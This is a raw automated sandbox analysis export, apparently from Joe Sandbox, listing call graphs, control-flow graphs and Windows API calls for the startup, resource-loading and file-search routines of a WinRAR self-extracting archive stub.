25607->25611 25733 18d242 4 API calls 2 library calls 25608->25733 25610 18cfef 25724 19552c 25610->25724 25623 18cefe ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25611->25623 25727 1960cd 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25611->25727 25617 18ced8 25618 18cede 25617->25618 25728 196071 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25617->25728 25620 18cf5f 25647 18d35d GetStartupInfoW __cftof 25620->25647 25622 18cf65 25648 19601e 51 API calls 25622->25648 25623->25620 25729 1954f4 38 API calls 2 library calls 25623->25729 25626 18cf6d 25649 18b2fe 25626->25649 25630 18cf81 25630->25610 25631 18cf85 25630->25631 25632 18cf8e 25631->25632 25731 1954cf 28 API calls _abort 25631->25731 25732 18ca81 12 API calls ___scrt_uninitialize_crt 25632->25732 25635 18cf96 25635->25618 25637 18c919 25636->25637 25735 18d05e IsProcessorFeaturePresent 25637->25735 25639 18c925 25736 18fcfe 10 API calls 2 library calls 25639->25736 25641 18c92a 25642 18c92e 25641->25642 25737 195f57 25641->25737 25642->25607 25645 18c945 25645->25607 25647->25622 25648->25626 25804 17a590 25649->25804 25652 175d94 30 API calls 25653 18b326 25652->25653 25886 18655d 25653->25886 25655 18b32f __cftof 25890 186961 25655->25890 25659 18b3bc GetCommandLineW 25660 18b3cc 25659->25660 25661 18b4ad 25659->25661 25663 1714a3 28 API calls 25660->25663 25662 175eb3 29 API calls 25661->25662 25664 18b4b7 25662->25664 25665 18b3d6 25663->25665 25666 1757f6 26 API calls 25664->25666 25667 18894e 115 API calls 25665->25667 25668 18b4c4 25666->25668 25669 18b3e0 25667->25669 25670 171770 26 API calls 25668->25670 25671 171770 26 API calls 25669->25671 25672 18b4cd SetEnvironmentVariableW GetLocalTime 25670->25672 25673 18b3e9 25671->25673 25677 174c1e _swprintf 51 API calls 25672->25677 25675 18b490 25673->25675 25676 18b3f6 OpenFileMappingW 25673->25676 25678 1714a3 28 API calls 25675->25678 25679 18b40f MapViewOfFile 25676->25679 25680 18b486 CloseHandle 25676->25680 25681 18b532 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25677->25681 25682 18b49a 25678->25682 25679->25680 25683 18b41f UnmapViewOfFile MapViewOfFile 25679->25683 25680->25661 25684 187745 33 API calls 25681->25684 25685 18ae2d 30 API calls 25682->25685 25683->25680 25686 18b43d 25683->25686 25688 18b570 25684->25688 25689 18b4a4 25685->25689 25687 186bf9 28 API calls 25686->25687 25691 18b44d 25687->25691 25692 1771ea 133 API calls 25688->25692 25690 171770 26 API calls 25689->25690 25690->25661 25693 18ae2d 30 API calls 25691->25693 25694 18b580 25692->25694 25696 18b456 25693->25696 25695 184326 28 API calls 25694->25695 25697 18b58c 25695->25697 25698 178c7e 114 API calls 25696->25698 25699 184326 28 API calls 25697->25699 25700 18b469 25698->25700 25701 18b595 DialogBoxParamW 25699->25701 25702 178d34 114 API calls 25700->25702 25703 184418 26 API calls 25701->25703 25704 18b474 25702->25704 25705 18b5d2 25703->25705 25707 18b47f UnmapViewOfFile 25704->25707 25706 184418 26 API calls 25705->25706 25708 18b5de 25706->25708 25707->25680 25709 18b5e7 Sleep 25708->25709 25711 18b5ee 25708->25711 25709->25711 25710 18b5fc 25713 18b606 DeleteObject 25710->25713 25711->25710 25712 186b0c 48 API calls 25711->25712 25712->25710 25714 18b61b DeleteObject 25713->25714 25715 18b622 25713->25715 25714->25715 25716 18b652 25715->25716 25717 18b664 25715->25717 25718 18af00 6 API calls 25716->25718 25720 1865c3 GdiplusShutdown OleUninitialize 25717->25720 25719 18b658 CloseHandle 25718->25719 25719->25717 25721 18b69e 25720->25721 25722 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25721->25722 25723 18b6b1 25722->25723 25730 18d3a3 GetModuleHandleW 25723->25730 25954 1952a9 25724->25954 25727->25617 25728->25623 25729->25620 25730->25630 25731->25632 25732->25635 25733->25610 25735->25639 25736->25641 25741 1993fa 25737->25741 25740 18fd1d 7 API calls 2 library calls 25740->25642 25744 199417 25741->25744 25745 199413 25741->25745 25742 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25743 18c937 25742->25743 25743->25645 25743->25740 25744->25745 25747 197a80 25744->25747 25745->25742 25748 197a8c ___scrt_is_nonwritable_in_current_image 25747->25748 25759 197fd1 EnterCriticalSection 25748->25759 25750 197a93 25760 1998c8 25750->25760 25752 197aa2 25753 197ab1 25752->25753 25773 197910 29 API calls 25752->25773 25775 197acd LeaveCriticalSection _abort 25753->25775 25756 197ac2 _abort 25756->25744 25757 197aac 25774 1979c6 GetStdHandle GetFileType 25757->25774 25759->25750 25761 1998d4 ___scrt_is_nonwritable_in_current_image 25760->25761 25762 1998f8 25761->25762 25763 1998e1 25761->25763 25776 197fd1 EnterCriticalSection 25762->25776 25784 196933 20 API calls _free 25763->25784 25766 1998e6 25785 19147e 26 API calls ___std_exception_copy 25766->25785 25768 1998f0 _abort 25768->25752 25769 199930 25786 199957 LeaveCriticalSection _abort 25769->25786 25772 199904 25772->25769 25777 199819 25772->25777 25773->25757 25774->25753 25775->25756 25776->25772 25787 1984d6 25777->25787 25779 19982b 25783 199838 25779->25783 25800 1982aa 11 API calls 2 library calls 25779->25800 25781 19988a 25781->25772 25794 196b34 25783->25794 25784->25766 25785->25768 25786->25768 25793 1984e3 _unexpected 25787->25793 25788 198523 25802 196933 20 API calls _free 25788->25802 25789 19850e RtlAllocateHeap 25791 198521 25789->25791 25789->25793 25791->25779 25793->25788 25793->25789 25801 19506e 7 API calls 2 library calls 25793->25801 25795 196b3f RtlFreeHeap 25794->25795 25799 196b68 _free 25794->25799 25796 196b54 25795->25796 25795->25799 25803 196933 20 API calls _free 25796->25803 25798 196b5a GetLastError 25798->25799 25799->25781 25800->25779 25801->25793 25802->25791 25803->25798 25906 18c600 25804->25906 25807 17a63d 25811 17a9b0 25807->25811 25932 194bfd 42 API calls 2 library calls 25807->25932 25808 17a5e8 GetProcAddress 25809 17a612 GetProcAddress 25808->25809 25810 17a5fa 25808->25810 25809->25807 25812 17a624 25809->25812 25810->25809 25814 175eb3 29 API calls 25811->25814 25812->25807 25816 17a9bb 25814->25816 25815 17a8ad 25815->25811 25817 175eb3 29 API calls 25815->25817 25818 17654f 45 API calls 25816->25818 25819 17a8c1 25817->25819 25841 17a9cf 25818->25841 25820 17a8d2 CreateFileW 25819->25820 25821 17a8cf 25819->25821 25823 17a8f0 SetFilePointer 25820->25823 25824 17a99b CloseHandle 25820->25824 25821->25820 25822 175032 6 API calls 25822->25841 25823->25824 25825 17a902 ReadFile 25823->25825 25826 171770 26 API calls 25824->25826 25825->25824 25827 17a91e 25825->25827 25828 17a9ae 25826->25828 25831 17ac07 25827->25831 25832 17a92f 25827->25832 25828->25811 25830 1714a3 28 API calls 25830->25841 25938 18c7bf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25831->25938 25833 1714a3 28 API calls 25832->25833 25840 17a948 25833->25840 25835 17a9f3 CompareStringW 25835->25841 25836 1766d5 45 API calls 25836->25841 25837 17ac0c 25839 171770 26 API calls 25839->25841 25842 17a98b 25840->25842 25851 17a473 30 API calls 25840->25851 25933 179b75 25840->25933 25841->25822 25841->25830 25841->25835 25841->25836 25841->25839 25843 174461 49 API calls 25841->25843 25874 17aa5d 25841->25874 25908 17a473 25841->25908 25846 171770 26 API calls 25842->25846 25843->25841 25844 17aab3 25937 1765bf 45 API calls 25844->25937 25845 17abd2 25848 171770 26 API calls 25845->25848 25849 17a993 25846->25849 25853 17abda 25848->25853 25854 171770 26 API calls 25849->25854 25850 1714a3 28 API calls 25850->25874 25851->25840 25852 17aabc 25855 175032 6 API calls 25852->25855 25856 171770 26 API calls 25853->25856 25854->25824 25858 17aac1 25855->25858 25859 17abe2 25856->25859 25857 1766d5 45 API calls 25857->25874 25860 17ab47 25858->25860 25861 17aac8 25858->25861 25862 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25859->25862 25865 17a2ad 53 API calls 25860->25865 25864 17a473 30 API calls 25861->25864 25866 17abfd 25862->25866 25863 171770 26 API calls 25863->25874 25867 17aad2 25864->25867 25868 17ab70 AllocConsole 25865->25868 25866->25652 25870 17a473 30 API calls 25867->25870 25871 17ab7d GetCurrentProcessId AttachConsole 25868->25871 25885 17ab25 25868->25885 25869 174461 49 API calls 25869->25874 25872 17aadc 25870->25872 25873 17ab98 25871->25873 25876 177fca 53 API calls 25872->25876 25880 17aba1 GetStdHandle WriteConsoleW Sleep FreeConsole 25873->25880 25874->25850 25874->25857 25874->25863 25874->25869 25875 17aaa7 25874->25875 25875->25844 25875->25845 25878 17ab01 25876->25878 25877 17abca ExitProcess 25879 17a2ad 53 API calls 25878->25879 25881 17ab0b 25879->25881 25880->25885 25882 177fca 53 API calls 25881->25882 25883 17ab1c 25882->25883 25884 1714a3 28 API calls 25883->25884 25884->25885 25885->25877 25887 17a473 30 API calls 25886->25887 25888 186571 OleInitialize 25887->25888 25889 186594 GdiplusStartup SHGetMalloc 25888->25889 25889->25655 25891 1757f6 26 API calls 25890->25891 25892 18696f 25891->25892 25893 1757f6 26 API calls 25892->25893 25894 18697b 25893->25894 25895 1757f6 26 API calls 25894->25895 25896 186987 25895->25896 25897 1757f6 26 API calls 25896->25897 25898 186993 25897->25898 25899 186913 25898->25899 25900 171770 26 API calls 25899->25900 25901 18691e 25900->25901 25902 171770 26 API calls 25901->25902 25903 186926 25902->25903 25904 171770 26 API calls 25903->25904 25905 18692e 25904->25905 25907 17a5a2 GetModuleHandleW 25906->25907 25907->25807 25907->25808 25909 17a47f __EH_prolog3_GS 25908->25909 25910 18c386 28 API calls 25909->25910 25911 17a48c 25910->25911 25912 17a4a2 GetSystemDirectoryW 25911->25912 25913 17a4c0 25912->25913 25930 17a4b9 25912->25930 25914 1714a3 28 API calls 25913->25914 25915 17a4e2 25914->25915 25917 1714a3 28 API calls 25915->25917 25916 17a586 25919 18c417 5 API calls 25916->25919 25920 17a4ef 25917->25920 25921 17a58d 25919->25921 25939 176449 25920->25939 25921->25841 25924 171770 26 API calls 25925 17a50c 25924->25925 25926 171770 26 API calls 25925->25926 25927 17a514 LoadLibraryW 25926->25927 25929 17a531 25927->25929 25927->25930 25929->25930 25951 1716b3 26 API calls 25929->25951 25930->25916 25952 1712a3 26 API calls 25930->25952 25932->25815 25935 179b8f 25933->25935 25934 179bc6 25934->25840 25935->25934 25936 171873 28 API calls 25935->25936 25936->25935 25937->25852 25938->25837 25940 176455 __EH_prolog3_GS 25939->25940 25941 171fa4 28 API calls 25940->25941 25942 176467 25941->25942 25943 176484 25942->25943 25953 175866 28 API calls 25942->25953 25945 1717b3 28 API calls 25943->25945 25946 17649a 25945->25946 25947 171770 26 API calls 25946->25947 25948 1764ad 25947->25948 25949 18c417 5 API calls 25948->25949 25950 1764b2 25949->25950 25950->25924 25951->25930 25952->25916 25953->25943 25955 1952b5 _unexpected 25954->25955 25956 1952bc 25955->25956 25957 1952ce 25955->25957 25990 195403 GetModuleHandleW 25956->25990 25978 197fd1 EnterCriticalSection 25957->25978 25960 1952c1 25960->25957 25991 195447 GetModuleHandleExW 25960->25991 25963 1952d5 25965 19534a 25963->25965 25975 195373 25963->25975 25999 195dc0 20 API calls _abort 25963->25999 25969 195362 25965->25969 26000 196071 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25965->26000 25967 1953bc 26002 19f720 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25967->26002 25968 195390 25982 1953c2 25968->25982 26001 196071 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25969->26001 25979 1953b3 25975->25979 25978->25963 26003 198021 LeaveCriticalSection 25979->26003 25981 19538c 25981->25967 25981->25968 26004 198416 25982->26004 25985 1953f0 25988 195447 _abort 8 API calls 25985->25988 25986 1953d0 GetPEB 25986->25985 25987 1953e0 GetCurrentProcess TerminateProcess 25986->25987 25987->25985 25989 1953f8 ExitProcess 25988->25989 25990->25960 25992 195471 GetProcAddress 25991->25992 25993 195494 25991->25993 25994 195486 25992->25994 25995 19549a FreeLibrary 25993->25995 25996 1954a3 25993->25996 25994->25993 25995->25996 25997 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25996->25997 25998 1952cd 25997->25998 25998->25957 25999->25965 26000->25969 26001->25975 26003->25981 26005 19843b 26004->26005 26006 198431 26004->26006 26011 198038 5 API calls _unexpected 26005->26011 26008 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 26006->26008 26009 1953cc 26008->26009 26009->25985 26009->25986 26010 198452 26010->26006 26011->26010 26012 18baf2 26013 18bdd7 ___delayLoadHelper2@8 17 API calls 26012->26013 26014 18baff 26013->26014 26015 189773 26016 171fa4 28 API calls 26015->26016 26022 189792 _wcslen 26016->26022 26017 1899fa 26018 171fa4 28 API calls 26017->26018 26027 188d1c 26017->26027 26019 189a4c 26018->26019 26064 18a800 26019->26064 26022->26017 26025 17122c 28 API calls 26022->26025 26022->26027 26023 171770 26 API calls 26023->26027 26026 18985e 26025->26026 26105 179c69 28 API calls 26026->26105 26027->26023 26028 18a439 __EH_prolog3_GS 26027->26028 26034 18a3fa 26027->26034 26048 171fd0 45 API calls 26027->26048 26050 1757f6 26 API calls 26027->26050 26053 1714a3 28 API calls 26027->26053 26059 179c69 28 API calls 26027->26059 26102 179adc 30 API calls 2 library calls 26027->26102 26103 186674 28 API calls 26027->26103 26104 17a251 CompareStringW 26027->26104 26109 18b29a 26 API calls 26027->26109 26110 18726a 28 API calls 26027->26110 26111 1729a7 45 API calls 26027->26111 26031 18a4ca 26028->26031 26112 175628 28 API calls _wcslen 26028->26112 26032 18c417 5 API calls 26031->26032 26035 18a4cf 26032->26035 26033 189961 26045 189999 26033->26045 26107 1716b3 26 API calls 26033->26107 26036 171770 26 API calls 26034->26036 26038 18a405 26036->26038 26039 18c417 5 API calls 26038->26039 26042 18a40a 26039->26042 26040 18a4a3 26113 171170 28 API calls _wcslen 26040->26113 26045->26017 26108 1716b3 26 API calls 26045->26108 26046 171770 26 API calls 26062 18988f 26046->26062 26047 18a4b2 26049 1757f6 26 API calls 26047->26049 26048->26027 26052 18a4ba 26049->26052 26050->26027 26051 1714a3 28 API calls 26051->26062 26055 171770 26 API calls 26052->26055 26053->26027 26056 18a4c2 26055->26056 26057 171770 26 API calls 26056->26057 26057->26031 26059->26027 26061 17a251 CompareStringW 26061->26062 26062->26033 26062->26046 26062->26051 26062->26061 26106 179c69 28 API calls 26062->26106 26069 18a80c __cftof __EH_prolog3_GS 26064->26069 26065 171770 26 API calls 26066 18ab2f 26065->26066 26067 18c417 5 API calls 26066->26067 26068 18ab34 26067->26068 26068->26027 26070 18a97e 26069->26070 26083 18ab08 26069->26083 26120 17bf3c CompareStringW 26069->26120 26072 1714a3 28 API calls 26070->26072 26073 18a994 26072->26073 26074 17444f 49 API calls 26073->26074 26075 18a9a1 26074->26075 26076 171770 26 API calls 26075->26076 26077 18a9ab 26076->26077 26078 18a9fd ShellExecuteExW 26077->26078 26081 1714a3 28 API calls 26077->26081 26079 18aadc 26078->26079 26080 18aa12 26078->26080 26079->26083 26123 1716b3 26 API calls 26079->26123 26084 18aa2e IsWindowVisible 26080->26084 26085 18aa45 WaitForInputIdle 26080->26085 26089 18aa90 CloseHandle 26080->26089 26082 18a9d1 26081->26082 26121 1758d4 51 API calls 2 library calls 26082->26121 26083->26065 26084->26085 26090 18aa39 ShowWindow 26084->26090 26114 18af00 WaitForSingleObject 26085->26114 26087 18a9e2 26092 171770 26 API calls 26087->26092 26093 18aaa8 26089->26093 26094 18aa9d 26089->26094 26090->26085 26096 18a9ee 26092->26096 26093->26079 26100 18aad3 ShowWindow 26093->26100 26122 17bf3c CompareStringW 26094->26122 26095 18aa5b 26095->26089 26098 18aa68 GetExitCodeProcess 26095->26098 26096->26078 26098->26089 26099 18aa79 26098->26099 26099->26089 26100->26079 26102->26027 26103->26027 26104->26027 26105->26062 26106->26062 26107->26045 26108->26017 26109->26027 26110->26027 26112->26040 26113->26047 26115 18af1b 26114->26115 26116 18af60 26114->26116 26117 18af1e PeekMessageW 26115->26117 26116->26095 26118 18af30 GetMessageW TranslateMessage DispatchMessageW 26117->26118 26119 18af51 WaitForSingleObject 26117->26119 26118->26119 26119->26116 26119->26117 26120->26070 26121->26087 26122->26093 26123->26083

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 502 18b2fe-18b3c6 call 17a590 call 175d94 call 18655d call 18dc30 call 186961 call 186913 GetCommandLineW 515 18b3cc-18b3f0 call 1714a3 call 18894e call 171770 502->515 516 18b4ad-18b4d6 call 175eb3 call 1757f6 call 171770 502->516 531 18b490-18b49f call 1714a3 call 18ae2d 515->531 532 18b3f6-18b40d OpenFileMappingW 515->532 529 18b4d8 516->529 530 18b4dd-18b5e5 SetEnvironmentVariableW GetLocalTime call 174c1e SetEnvironmentVariableW GetModuleHandleW LoadIconW call 187745 call 1771ea call 184326 * 2 DialogBoxParamW call 184418 * 2 516->530 529->530 566 18b5ee-18b5f5 530->566 567 18b5e7-18b5e8 Sleep 530->567 545 18b4a4-18b4a8 call 171770 531->545 535 18b40f-18b41d MapViewOfFile 532->535 536 18b486-18b48e CloseHandle 532->536 535->536 539 18b41f-18b43b UnmapViewOfFile MapViewOfFile 535->539 536->516 539->536 542 18b43d-18b480 call 186bf9 call 18ae2d call 178c7e call 178d34 call 178d6d UnmapViewOfFile 539->542 542->536 545->516 568 18b5fc-18b619 call 178bb6 DeleteObject 566->568 569 18b5f7 call 186b0c 566->569 567->566 573 18b61b-18b61c DeleteObject 568->573 574 18b622-18b628 568->574 569->568 573->574 575 18b62a-18b631 574->575 576 18b642-18b650 574->576 575->576 577 18b633-18b63d call 172fe8 575->577 578 18b652-18b65e call 18af00 CloseHandle 576->578 579 18b664-18b671 576->579 577->576 578->579 582 18b673-18b67f 579->582 583 18b695-18b699 call 1865c3 579->583 585 18b68f-18b691 582->585 586 18b681-18b689 582->586 588 18b69e-18b6b7 call 18c3c4 583->588 585->583 590 18b693 585->590 586->583 589 18b68b-18b68d 586->589 589->583 590->583
                        APIs
                          • Part of subcall function 0017A590: GetModuleHandleW.KERNEL32(kernel32,B19080A7), ref: 0017A5DC
                          • Part of subcall function 0017A590: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017A5EE
                          • Part of subcall function 0017A590: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0017A618
                          • Part of subcall function 00175D94: __EH_prolog3.LIBCMT ref: 00175D9B
                          • Part of subcall function 00175D94: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4
                          • Part of subcall function 0018655D: OleInitialize.OLE32(00000000), ref: 00186576
                          • Part of subcall function 0018655D: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001865AD
                          • Part of subcall function 0018655D: SHGetMalloc.SHELL32(001CAA78), ref: 001865B7
                        • GetCommandLineW.KERNEL32 ref: 0018B3BC
                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0018B403
                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 0018B415
                        • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0018B423
                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0018B431
                          • Part of subcall function 00186BF9: __EH_prolog3.LIBCMT ref: 00186C00
                          • Part of subcall function 0018AE2D: __EH_prolog3_GS.LIBCMT ref: 0018AE34
                          • Part of subcall function 0018AE2D: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 0018AE4C
                          • Part of subcall function 0018AE2D: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 0018AEB7
                          • Part of subcall function 00178D34: _wcslen.LIBCMT ref: 00178D58
                        • UnmapViewOfFile.KERNEL32(00000000,001CAB80,00000400,001CAB80,001CAB80,00000400,00000000,00000001,?,00000000), ref: 0018B480
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0018B487
                        • SetEnvironmentVariableW.KERNEL32(sfxname,001AE668,00000000), ref: 0018B4E3
                        • GetLocalTime.KERNEL32(?), ref: 0018B4EE
                        • _swprintf.LIBCMT ref: 0018B52D
                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0018B542
                        • GetModuleHandleW.KERNEL32(00000000), ref: 0018B549
                        • LoadIconW.USER32(00000000,00000064), ref: 0018B560
                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00017860,00000000), ref: 0018B5B7
                        • Sleep.KERNELBASE(00001B58), ref: 0018B5E8
                        • DeleteObject.GDI32 ref: 0018B60C
                        • DeleteObject.GDI32(00050EC9), ref: 0018B61C
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                          • Part of subcall function 0018894E: __EH_prolog3_GS.LIBCMT ref: 00188955
                        • CloseHandle.KERNEL32 ref: 0018B65E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                        • API String ID: 3142445277-3710569615
                        • Opcode ID: 384424170f510d53a0418990a60e8d2fc9aecae1b362a0bf93d4d4652293c141
                        • Instruction ID: 96936ee457ec947a9e4fef3c756700996d1482274a73ccc8db336cbb6709771e
                        • Opcode Fuzzy Hash: 384424170f510d53a0418990a60e8d2fc9aecae1b362a0bf93d4d4652293c141
                        • Instruction Fuzzy Hash: F4919EB1508348AFC321BB64DC8AFAF7BE8AF59705F40481DF54992591EB34DA84CF62

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 725 185c5c-185c79 FindResourceW 726 185c7f-185c90 SizeofResource 725->726 727 185d75 725->727 726->727 728 185c96-185ca5 LoadResource 726->728 729 185d77-185d7b 727->729 728->727 730 185cab-185cb6 LockResource 728->730 730->727 731 185cbc-185cd1 GlobalAlloc 730->731 732 185d6d-185d73 731->732 733 185cd7-185ce0 GlobalLock 731->733 732->729 734 185d66-185d67 GlobalFree 733->734 735 185ce6-185d04 call 18d6b0 733->735 734->732 739 185d5f-185d60 GlobalUnlock 735->739 740 185d06-185d28 call 185bd6 735->740 739->734 740->739 745 185d2a-185d32 740->745 746 185d4d-185d5b 745->746 747 185d34-185d48 GdipCreateHBITMAPFromBitmap 745->747 746->739 747->746 748 185d4a 747->748 748->746
                        APIs
                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001877A5,00000066), ref: 00185C6F
                        • SizeofResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C86
                        • LoadResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C9D
                        • LockResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185CAC
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CC7
                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CD8
                        • GlobalUnlock.KERNEL32(00000000), ref: 00185D60
                          • Part of subcall function 00185BD6: GdipAlloc.GDIPLUS(00000010), ref: 00185BDC
                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00185D41
                        • GlobalFree.KERNEL32(00000000), ref: 00185D67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                        • String ID: PNG
                        • API String ID: 541704414-364855578
                        • Opcode ID: 3a8ec618386101f5133bccb44293b5d1005f15a16f018cefd70677bedff7e6ed
                        • Instruction ID: d5ddb74ffe7da28208f69690883f700fa2aaee23e436094e42bd956572afc236
                        • Opcode Fuzzy Hash: 3a8ec618386101f5133bccb44293b5d1005f15a16f018cefd70677bedff7e6ed
                        • Instruction Fuzzy Hash: 93317E71600A06AFC311AF65DC4CD1BBFAAFF867517044619FD0692661EB31DD40CFA1
                        APIs
                          • Part of subcall function 0017B976: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B946,?,?,?,?,0000000C), ref: 0017B992
                        • _wcslen.LIBCMT ref: 0017760C
                        • __fprintf_l.LIBCMT ref: 00177759
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__fprintf_l_wcslen
                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                        • API String ID: 1796436225-285229759
                        • Opcode ID: 00b2dbad5dd79c5c1224311ee6ecd499251be49323516d5fd3f3bcbe07f9b441
                        • Instruction ID: b33be88b6f0a1b7d6f7e64782ebf7660275f8170f8a9867bf1c76e84ab4ff102
                        • Opcode Fuzzy Hash: 00b2dbad5dd79c5c1224311ee6ecd499251be49323516d5fd3f3bcbe07f9b441
                        • Instruction Fuzzy Hash: 7152E471904219ABDF24DFA8CC85AEEB7B5FF14310F50852AF519EB2C1E7709A41CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1557 174d8a-174da5 call 18c468 1560 174dab-174db1 1557->1560 1561 174e89-174e99 FindNextFileW 1557->1561 1562 174db5-174dc8 FindFirstFileW 1560->1562 1563 174db3 1560->1563 1564 174eac-174f5e call 1721d7 call 1714a3 call 1766d5 call 171770 call 17ae56 * 3 1561->1564 1565 174e9b-174eaa GetLastError 1561->1565 1562->1564 1568 174dce-174df2 call 1760a8 1562->1568 1563->1562 1571 174f63-174f6e call 18c417 1564->1571 1566 174e81-174e84 1565->1566 1566->1571 1577 174df4-174dfb 1568->1577 1578 174e10-174e1a 1568->1578 1582 174e00-174e0e FindFirstFileW 1577->1582 1583 174dfd 1577->1583 1579 174e61-174e64 1578->1579 1580 174e1c-174e37 1578->1580 1579->1564 1587 174e66-174e6f GetLastError 1579->1587 1584 174e39-174e52 call 1716b3 1580->1584 1585 174e58-174e60 call 18c3b6 1580->1585 1582->1578 1583->1582 1584->1585 1585->1579 1591 174e71-174e74 1587->1591 1592 174e7f 1587->1592 1591->1592 1596 174e76-174e79 1591->1596 1592->1566 1596->1592 1598 174e7b-174e7d 1596->1598 1598->1566
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00174D94
                        • FindFirstFileW.KERNELBASE(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174DBD
                        • FindFirstFileW.KERNELBASE(-00000028,-00000278,?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E08
